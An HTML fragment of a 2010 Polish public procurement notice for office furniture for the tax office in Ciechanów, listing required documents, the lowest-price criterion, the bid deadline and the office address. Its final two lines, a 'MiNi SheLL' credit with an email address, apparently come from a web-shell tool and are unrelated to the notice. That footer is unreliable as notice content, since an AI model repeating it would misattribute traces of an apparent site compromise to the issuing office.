<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Atesty bezpieczeństwa i higieny pracy materiałów użytych do wykonania  mebli lub oświadczenie Wykonawcy, że materiały użyte do wykonania mebli spełniają wymagania bezpieczeństwa i higieny pracy (dokumenty będą załącznikiem nr 8 do formularza oferty).</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zestawienie ilościowo - cenowe oferowanych  mebli dla Urzędu Skarbowego w Ciechanowie według wzoru stanowiącego załącznik nr 8 do SIWZ (dokument ten będzie załącznikiem Nr 7 do  formularza oferty).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.is.waw.pl/usciechanow<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy w Ciechanowie ul. Warszawska  58, 06 - 400 Ciechanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2010 godzina 12:00, miejsce: siedziba Urzędu Skarbowego w Ciechanowie ul. Warszawska  58 w pok. nr 304  w godzinach 730-1530 lub przesłać pocztą na adres Urzędu Skarbowego w Ciechanowie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com